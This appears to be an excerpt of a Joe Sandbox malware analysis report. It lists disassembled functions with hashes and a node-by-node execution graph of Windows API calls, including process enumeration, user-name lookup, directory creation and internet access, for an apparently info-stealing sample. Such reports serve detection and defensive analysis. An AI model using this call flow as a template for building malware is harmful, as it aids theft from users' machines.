                                                    • Associated: 00000000.00000002.2087198453.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087240856.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000C94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000CC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087296795.0000000000CCB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c60000_56bDgH9sMQ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                    • String ID:
                                                    • API String ID: 2112829910-0
                                                    • Opcode ID: 41134b96a792695a1e8730f6164d3b9229a4eaecb6b8fa3dfb217f1d63bd829c
                                                    • Instruction ID: 351c9ce98c332d91490f3cfae09d1c158270be631d2da25797e1fac9a31d805a
                                                    • Opcode Fuzzy Hash: 41134b96a792695a1e8730f6164d3b9229a4eaecb6b8fa3dfb217f1d63bd829c
                                                    • Instruction Fuzzy Hash: 16D157B5D002489FCB15CFE8D880AADBBB5FF48310F18856AE86AE7351D730A946CF51
                                                    Function 00C6C541 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    • Associated: 00000000.00000002.2087198453.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087240856.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000C94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000CC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087296795.0000000000CCB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c60000_56bDgH9sMQ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AdjustPointer
                                                    • String ID:
                                                    • API String ID: 1740715915-0
                                                    • Opcode ID: 9449a585bb51b6bff42b47c2d3a3481fc51f3214f31c1da5252729b2992c37f3
                                                    • Instruction ID: e4022a1d44775208b15ec60b8143e45780fa3460cc3cfdad8f04d1f124bbc7d3
                                                    • Opcode Fuzzy Hash: 9449a585bb51b6bff42b47c2d3a3481fc51f3214f31c1da5252729b2992c37f3
                                                    • Instruction Fuzzy Hash: 7F510072600206AFDB389F51C9C1BBA77A4EF44710F20452DF8A697291D731ED90EB94
                                                    Function 00C7D146 Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00C7CD2A: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00C7A268,?,00000000,-00000008), ref: 00C7CDD6
                                                    • GetLastError.KERNEL32 ref: 00C7D1AA
                                                    • __dosmaperr.LIBCMT ref: 00C7D1B1
                                                    • GetLastError.KERNEL32(?,?,?,?), ref: 00C7D1EB
                                                    • __dosmaperr.LIBCMT ref: 00C7D1F2
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    • Associated: 00000000.00000002.2087198453.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087240856.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000C94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000CC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087296795.0000000000CCB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c60000_56bDgH9sMQ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                    • String ID:
                                                    • API String ID: 1913693674-0
                                                    • Opcode ID: 3fad3c31a5142faed5d8ac6393b29a44a66c5b7f811a65fee7a71f701d5ee13a
                                                    • Instruction ID: 451b6f8761f570d066a9b32d3ec08e6a713c4886f4398fdf7c31ade45060ae4e
                                                    • Opcode Fuzzy Hash: 3fad3c31a5142faed5d8ac6393b29a44a66c5b7f811a65fee7a71f701d5ee13a
                                                    • Instruction Fuzzy Hash: 4B219271600205AFDB20AF66DC8196FB7B9EF00374B54C529F92ED7152DB30EE41ABA0
                                                    Function 00C73878 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    • Associated: 00000000.00000002.2087198453.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087240856.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000C94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000CC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087296795.0000000000CCB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c60000_56bDgH9sMQ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8bf1325c66453531c7668fd8c89b960c7de780472d7b6c7f276b1efa60f59254
                                                    • Instruction ID: 3cc2d4f00de348fe594fef508ea7d08c065c4ff22ab86719df7310b59d014491
                                                    • Opcode Fuzzy Hash: 8bf1325c66453531c7668fd8c89b960c7de780472d7b6c7f276b1efa60f59254
                                                    • Instruction Fuzzy Hash: 9B21A1B1600285BFDB20AF759C8096B7BA9EF403A4714C525FA2DDB151E770EF40B760
                                                    Function 00C7E0DC Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetEnvironmentStringsW.KERNEL32 ref: 00C7E0E4
                                                      • Part of subcall function 00C7CD2A: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00C7A268,?,00000000,-00000008), ref: 00C7CDD6
                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00C7E11C
                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00C7E13C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    • Associated: 00000000.00000002.2087198453.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087240856.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000C94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000CC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087296795.0000000000CCB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c60000_56bDgH9sMQ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                    • String ID:
                                                    • API String ID: 158306478-0
                                                    • Opcode ID: aae9aca90168d8b057d86963d4cfff41e37d66a32cafe935b0fec529d82e7eae
                                                    • Instruction ID: 755064fa6ce795b131c20058c49f72e33bc26abb49ed9f7ab16375541778fc28
                                                    • Opcode Fuzzy Hash: aae9aca90168d8b057d86963d4cfff41e37d66a32cafe935b0fec529d82e7eae
                                                    • Instruction Fuzzy Hash: 7F11D6B350561A7F672227B65C8ED7F6E6CDE897987508564F40ED1102FE34CE0196B0
                                                    Function 00C84CA9 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,00000000,?,00C83A64,00000000,00000001,00000000,00000000,?,00C7AB74,00000000,00000000,00000000), ref: 00C84CC0
                                                    • GetLastError.KERNEL32(?,00C83A64,00000000,00000001,00000000,00000000,?,00C7AB74,00000000,00000000,00000000,00000000,00000000,?,00C7B0FB,00000000), ref: 00C84CCC
                                                      • Part of subcall function 00C84C92: CloseHandle.KERNEL32(FFFFFFFE,00C84CDC,?,00C83A64,00000000,00000001,00000000,00000000,?,00C7AB74,00000000,00000000,00000000,00000000,00000000), ref: 00C84CA2
                                                    • ___initconout.LIBCMT ref: 00C84CDC
                                                      • Part of subcall function 00C84C54: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00C84C83,00C83A51,00000000,?,00C7AB74,00000000,00000000,00000000,00000000), ref: 00C84C67
                                                    • WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,?,00C83A64,00000000,00000001,00000000,00000000,?,00C7AB74,00000000,00000000,00000000,00000000), ref: 00C84CF1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    • Associated: 00000000.00000002.2087198453.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087240856.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000C94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000CC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087296795.0000000000CCB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c60000_56bDgH9sMQ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                    • String ID:
                                                    • API String ID: 2744216297-0
                                                    • Opcode ID: 3c85266475ea432a5ff4c378ee72845bdf474d6ed4962435e9c54a97dc22e9e7
                                                    • Instruction ID: 6be33151c23830c76ddee02b89456de4f087647189bac5ad0f6a0cb868de8375
                                                    • Opcode Fuzzy Hash: 3c85266475ea432a5ff4c378ee72845bdf474d6ed4962435e9c54a97dc22e9e7
                                                    • Instruction Fuzzy Hash: B3F03036002115BBCF622F91DC08F9E3F6AFB083A4B044410FE2C85530CF328968AB99
                                                    Function 00C6C230 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 00C6C26F
                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00C6C323
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    • Associated: 00000000.00000002.2087198453.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087240856.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000C94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000CC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087296795.0000000000CCB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c60000_56bDgH9sMQ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CurrentImageNonwritable___except_validate_context_record
                                                    • String ID: csm
                                                    • API String ID: 3480331319-1018135373
                                                    • Opcode ID: f7ab06e937b3971afcc577621dee66a37a9f7b427564f4c5b671302b1ff2ddfd
                                                    • Instruction ID: 774e10ca49205c3fd854e2774470d9b14b1d5b778cd5270345b38613a23fcbba
                                                    • Opcode Fuzzy Hash: f7ab06e937b3971afcc577621dee66a37a9f7b427564f4c5b671302b1ff2ddfd
                                                    • Instruction Fuzzy Hash: 27419335A002089BCF20DFA9C8D4ABE7BB5EF45318F148165E865AB392D731AE15CB91
                                                    Function 00C6CB3D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • EncodePointer.KERNEL32(00000000,?), ref: 00C6CB62
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    • Associated: 00000000.00000002.2087198453.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087240856.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000C94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000CC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087296795.0000000000CCB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c60000_56bDgH9sMQ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: EncodePointer
                                                    • String ID: MOC$RCC
                                                    • API String ID: 2118026453-2084237596
                                                    • Opcode ID: 4463afc8a4a4aaeb831bfd7647703e5f31c83d495dc7d66f1f68aebf8de2bfb2
                                                    • Instruction ID: 680ba45b82d2187dddf5a3423e0006b89112549705c676f82d29267940ed2efb
                                                    • Opcode Fuzzy Hash: 4463afc8a4a4aaeb831bfd7647703e5f31c83d495dc7d66f1f68aebf8de2bfb2
                                                    • Instruction Fuzzy Hash: FD413572900209AFCF25DF98CDC1ABEBBB5FF48300F198059F958A7261D3359A61DB91
                                                    Function 00C62990 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00C62995
                                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00C629DA
                                                      • Part of subcall function 00C66048: _Yarn.LIBCPMT ref: 00C66067
                                                      • Part of subcall function 00C66048: _Yarn.LIBCPMT ref: 00C6608B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    • Associated: 00000000.00000002.2087198453.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087240856.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000C94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000CC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087296795.0000000000CCB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c60000_56bDgH9sMQ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                    • String ID: bad locale name
                                                    • API String ID: 1908188788-1405518554
                                                    • Opcode ID: a9ba9387caf594e505c24f95733ddeb716f34c534ebdc40652d751334959f51e
                                                    • Instruction ID: 21e8340397c1ed9bccfe005868f391c891a018ceb677d2e782671f1ed19eb66d
                                                    • Opcode Fuzzy Hash: a9ba9387caf594e505c24f95733ddeb716f34c534ebdc40652d751334959f51e
                                                    • Instruction Fuzzy Hash: 9FF017B1105B408ED370DF798845743BAE0AF29314F048E2EE4CAC7A51E375E549CBAA
                                                    Function 00C63260 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 20COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00C6326F
                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00C6328A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    • Associated: 00000000.00000002.2087198453.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087240856.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000C94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000CC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087296795.0000000000CCB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c60000_56bDgH9sMQ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                    • String ID: ios_base::badbit set
                                                    • API String ID: 593203224-3882152299
                                                    • Opcode ID: 6c4435ee9f4e4e7871327e56923e9b28e115215ba2292c170f9c4a4e0a231e97
                                                    • Instruction ID: 0a25673d4e9ac69d3dce03412d6807e300decb38f8992b4f6d6beb5fdb72074e
                                                    • Opcode Fuzzy Hash: 6c4435ee9f4e4e7871327e56923e9b28e115215ba2292c170f9c4a4e0a231e97
                                                    • Instruction Fuzzy Hash: D6E0B671518211EFD774DF18D891B9AB3E4EB24721F20066EE4C5821A1EBB499C5DB81

                                                    Execution Graph

                                                    Execution Coverage:4.9%
                                                    Dynamic/Decrypted Code Coverage:0.7%
                                                    Signature Coverage:12.2%
                                                    Total number of Nodes:2000
                                                    Total number of Limit Nodes:37
                                                    execution_graph 79670 1fa2fd40 79672 1fa2fd67 79670->79672 79671 1fa2fdf4 ReadFile 79671->79672 79673 1fa2fd83 79671->79673 79672->79671 79672->79673 79674 1fa37d30 79675 1fa37d43 79674->79675 79677 1fa37d49 79674->79677 79678 1fbb8d80 79675->79678 79679 1fbb8d8f 79678->79679 79681 1fbb8e6f 79679->79681 79682 1fa34cf0 79679->79682 79681->79677 79684 1fa34d30 79682->79684 79683 1fa34ed5 CreateFileW 79683->79684 79684->79683 79685 1fa3506d 79684->79685 79685->79681 79686 41a76b 6 API calls 79687 41a7e2 17 API calls 79686->79687 79688 41a7bc GetProcAddress GetProcAddress 79686->79688 79718 402339 79687->79718 79688->79687 79696 41a955 79820 41185b 79696->79820 79698 41a975 79699 41185b 4 API calls 79698->79699 79700 41a97c 79699->79700 79701 41185b 4 API calls 79700->79701 79702 41a983 79701->79702 79828 41177a 79702->79828 79704 41a98c 79705 41a9a4 12 API calls 79704->79705 79706 41aa04 79705->79706 79707 41ab51 12 API calls 79706->79707 79708 41aa0d 6 API calls 79706->79708 79832 418fd9 79707->79832 80212 41193a 79708->80212 79711 41aa45 OpenEventA 79713 41aad8 8 API calls 79711->79713 79714 41aa5c 6 API calls 79711->79714 79716 41ab1c 6 API calls 79713->79716 80213 41193a 79714->80213 79716->79706 79717 41aa94 7 API calls 79717->79707 80214 404239 LocalAlloc 79718->80214 79720 40234d 79721 404239 12 API calls 79720->79721 79722 402366 79721->79722 79723 404239 12 API calls 79722->79723 79724 40237f 79723->79724 79725 404239 12 API calls 79724->79725 79726 402398 79725->79726 79727 404239 12 API calls 79726->79727 79728 4023b1 79727->79728 79729 404239 12 API calls 79728->79729 79730 4023ca 79729->79730 79731 404239 12 API calls 79730->79731 79732 4023e3 79731->79732 79733 404239 12 API calls 79732->79733 79734 4023fc 79733->79734 79735 404239 12 API calls 79734->79735 79736 402415 79735->79736 79737 404239 12 API calls 79736->79737 79738 40242e 79737->79738 79739 404239 12 API calls 79738->79739 79740 402447 79739->79740 79741 404239 12 API calls 79740->79741 79742 402460 79741->79742 79743 404239 12 API calls 79742->79743 79744 402479 79743->79744 79745 404239 12 API calls 79744->79745 79746 402492 79745->79746 79747 404239 12 API calls 79746->79747 79748 4024ab 79747->79748 79749 404239 12 API calls 79748->79749 79750 4024c4 79749->79750 79751 404239 12 API calls 79750->79751 79752 4024dd 79751->79752 79753 404239 12 API calls 79752->79753 79754 4024f6 79753->79754 79755 404239 12 API calls 79754->79755 79756 40250f 79755->79756 79757 404239 12 API calls 79756->79757 79758 402528 79757->79758 79759 404239 12 API calls 79758->79759 79760 402541 79759->79760 79761 404239 12 API calls 79760->79761 79762 40255a 79761->79762 79763 404239 12 API calls 79762->79763 79764 402573 79763->79764 79765 404239 12 API calls 79764->79765 79766 40258c 79765->79766 79767 404239 12 API calls 79766->79767 79768 4025a5 79767->79768 79769 404239 12 API calls 79768->79769 79770 4025be 79769->79770 79771 404239 12 API calls 79770->79771 79772 4025d7 79771->79772 79773 404239 12 API calls 79772->79773 79774 4025f0 79773->79774 79775 404239 12 API calls 79774->79775 79776 402609 79775->79776 79777 404239 12 API calls 79776->79777 79778 402622 79777->79778 79779 404239 12 API calls 79778->79779 79780 40263b 79779->79780 79781 404239 12 API calls 79780->79781 79782 402654 79781->79782 79783 404239 12 API calls 79782->79783 79784 40266d 79783->79784 79785 404239 12 API calls 79784->79785 79786 402686 79785->79786 79787 404239 12 API calls 79786->79787 79788 40269f 79787->79788 79789 404239 12 API calls 79788->79789 79790 4026b8 79789->79790 79791 404239 12 API calls 79790->79791 79792 4026d1 79791->79792 79793 404239 12 API calls 79792->79793 79794 4026ea 79793->79794 79795 404239 12 API calls 79794->79795 79796 402703 79795->79796 79797 404239 12 API calls 79796->79797 79798 40271c 6 API calls 79797->79798 79799 41ad16 79798->79799 80218 41acf3 GetPEB 79799->80218 79801 41ad1e 79802 41ad30 79801->79802 79803 41af2b LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 79801->79803 79806 41ad41 21 API calls 79802->79806 79804 41afa0 79803->79804 79805 41af89 GetProcAddress 79803->79805 79807 41afd7 79804->79807 79808 41afa9 GetProcAddress GetProcAddress 79804->79808 79805->79804 79806->79803 79809 41afe0 GetProcAddress 79807->79809 79810 41aff7 79807->79810 79808->79807 79809->79810 79811 41b000 GetProcAddress 79810->79811 79812 41b017 79810->79812 79811->79812 79813 41b020 GetProcAddress GetProcAddress 79812->79813 79814 41a8b3 12 API calls 79812->79814 79813->79814 79815 411668 79814->79815 79816 411677 79815->79816 79817 4116ad 6 API calls 79816->79817 79818 41169f lstrcpyA 79816->79818 79819 411bec GetProcessHeap HeapAlloc GetUserNameA 79817->79819 79818->79817 79819->79696 80219 411648 79820->80219 79822 41186c lstrlenA 79825 411888 79822->79825 79823 4118ba 80220 4116b4 79823->80220 79825->79823 79826 4118a0 lstrcpyA lstrcatA 79825->79826 79826->79823 79827 4118c6 79827->79698 79829 411795 79828->79829 79830 4117d9 79829->79830 79831 4117c9 lstrcpyA 79829->79831 79830->79704 79831->79830 79833 418fe6 79832->79833 79834 411668 lstrcpyA 79833->79834 79835 418ff8 79834->79835 80224 411715 lstrlenA 79835->80224 79838 411715 2 API calls 79839 419025 79838->79839 80228 402727 79839->80228 79843 41922c 79845 411668 lstrcpyA 79843->79845 80040 4195ac 79843->80040 79847 419249 79845->79847 79846 4195d7 79848 41177a lstrcpyA 79846->79848 79849 41185b 4 API calls 79847->79849 79850 4195e2 79848->79850 79851 419260 79849->79851 79854 411668 lstrcpyA 79850->79854 79852 41177a lstrcpyA 79851->79852 79853 41926c 79852->79853 79856 41185b 4 API calls 79853->79856 79855 4195fd 79854->79855 79857 41185b 4 API calls 79855->79857 79858 41928e 79856->79858 79859 419620 79857->79859 79860 41177a lstrcpyA 79858->79860 80829 4117e0 79859->80829 79862 41929a 79860->79862 79865 41185b 4 API calls 79862->79865 79863 419627 79864 41177a lstrcpyA 79863->79864 79867 419633 79864->79867 79866 4192bc 79865->79866 79868 41177a lstrcpyA 79866->79868 79870 419656 CreateDirectoryA 79867->79870 79869 4192c8 79868->79869 79872 41185b 4 API calls 79869->79872 80835 40134c 79870->80835 79874 4192ea 79872->79874 79875 41177a lstrcpyA 79874->79875 79877 4192f6 79875->79877 79881 41185b 4 API calls 79877->79881 79878 419677 80947 41a4cb 79878->80947 79880 419686 79884 41177a lstrcpyA 79880->79884 79882 419318 79881->79882 79883 41177a lstrcpyA 79882->79883 79885 419324 79883->79885 79886 4196a0 79884->79886 79890 41185b 4 API calls 79885->79890 79887 41177a lstrcpyA 79886->79887 79888 4196af 79887->79888 79889 4116b4 lstrcpyA 79888->79889 79891 4196be 79889->79891 79892 419346 79890->79892 79893 41185b 4 API calls 79891->79893 79894 41177a lstrcpyA 79892->79894 79895 4196d5 79893->79895 79896 419352 79894->79896 79897 41177a lstrcpyA 79895->79897 79899 41185b 4 API calls 79896->79899 79898 4196e1 79897->79898 79902 4117e0 3 API calls 79898->79902 79900 419374 79899->79900 79901 41177a lstrcpyA 79900->79901 79903 419380 79901->79903 79904 419705 79902->79904 79906 41185b 4 API calls 79903->79906 79905 41177a lstrcpyA 79904->79905 79908 419711 79905->79908 79907 4193a2 79906->79907 79909 41177a lstrcpyA 79907->79909 79910 41972c InternetOpenA 79908->79910 79911 4193ae 79909->79911 80954 41193a 79910->80954 79915 41185b 4 API calls 79911->79915 79913 419746 InternetOpenA 79914 4116b4 lstrcpyA 79913->79914 79916 419767 79914->79916 79917 4193d0 79915->79917 79920 411668 lstrcpyA 79916->79920 79918 41177a lstrcpyA 79917->79918 79919 4193dc 79918->79919 79922 41185b 4 API calls 79919->79922 79921 419777 79920->79921 80955 411948 GetWindowsDirectoryA 79921->80955 79924 4193fe 79922->79924 79926 41177a lstrcpyA 79924->79926 79928 41940a 79926->79928 79927 4116b4 lstrcpyA 79929 41978f 79927->79929 79933 41185b 4 API calls 79928->79933 80974 4043fa 79929->80974 79931 419795 81114 414f8c 79931->81114 79935 41942c 79933->79935 79934 41979d 79937 411668 lstrcpyA 79934->79937 79936 41177a lstrcpyA 79935->79936 79938 419438 79936->79938 79939 4197cc 79937->79939 79942 41185b 4 API calls 79938->79942 79940 40134c lstrcpyA 79939->79940 79941 4197da 79940->79941 81134 4058c4 79941->81134 79944 41945a 79942->79944 79945 41177a lstrcpyA 79944->79945 79947 419466 79945->79947 79946 4197e0 81315 4148a0 79946->81315 79951 41185b 4 API calls 79947->79951 79949 4197e8 79950 411668 lstrcpyA 79949->79950 79952 41980a 79950->79952 79953 419488 79951->79953 79954 40134c lstrcpyA 79952->79954 79955 41177a lstrcpyA 79953->79955 79956 419818 79954->79956 79958 419494 79955->79958 79957 4058c4 40 API calls 79956->79957 79959 41981e 79957->79959 79962 41185b 4 API calls 79958->79962 81322 4145d9 79959->81322 79961 419826 79963 411668 lstrcpyA 79961->79963 79964 4194b6 79962->79964 79965 419848 79963->79965 79966 41177a lstrcpyA 79964->79966 79967 40134c lstrcpyA 79965->79967 79968 4194c2 79966->79968 79969 419856 79967->79969 79971 41185b 4 API calls 79968->79971 79970 4058c4 40 API calls 79969->79970 79972 41985c 79970->79972 79973 4194e4 79971->79973 81333 4147a4 79972->81333 79975 41177a lstrcpyA 79973->79975 79977 4194f0 79975->79977 79976 419864 79978 40134c lstrcpyA 79976->79978 79981 41185b 4 API calls 79977->79981 79979 419875 79978->79979 81341 4151e4 79979->81341 79984 419512 79981->79984 79982 41987a 79983 4116b4 lstrcpyA 79982->79983 79985 41988b 79983->79985 79986 41177a lstrcpyA 79984->79986 79988 411668 lstrcpyA 79985->79988 79987 41951e 79986->79987 79990 41185b 4 API calls 79987->79990 79989 4198a1 79988->79989 81681 404ad5 79989->81681 79992 419540 79990->79992 79994 41177a lstrcpyA 79992->79994 79993 4198a6 79995 40134c lstrcpyA 79993->79995 79996 41954c 79994->79996 79999 41185b 4 API calls 79996->79999 80001 41956e 79999->80001 80003 41177a lstrcpyA 80001->80003 80016 41957a 80003->80016 80812 4138ba CreateToolhelp32Snapshot Process32First 80016->80812 80821 412d64 80040->80821 80212->79711 80213->79717 80215 40425e 80214->80215 80216 4042dd wcslen wcslen wcslen wcslen 80215->80216 80217 40426d 7 API calls 80215->80217 80216->79720 80217->80215 80218->79801 80219->79822 80221 4116d4 80220->80221 80222 4116fa 80221->80222 80223 4116ea lstrcpyA 80221->80223 80222->79827 80223->80222 80225 411733 80224->80225 80226 411773 80225->80226 80227 411765 lstrcpyA 80225->80227 80226->79838 80227->80226 80229 404239 12 API calls 80228->80229 80230 40273b 80229->80230 80231 404239 12 API calls 80230->80231 80232 402754 80231->80232 80233 404239 12 API calls 80232->80233 80234 40276d 80233->80234 80235 404239 12 API calls 80234->80235 80236 402786 80235->80236 80237 404239 12 API calls 80236->80237 80238 40279f 80237->80238 80239 404239 12 API calls 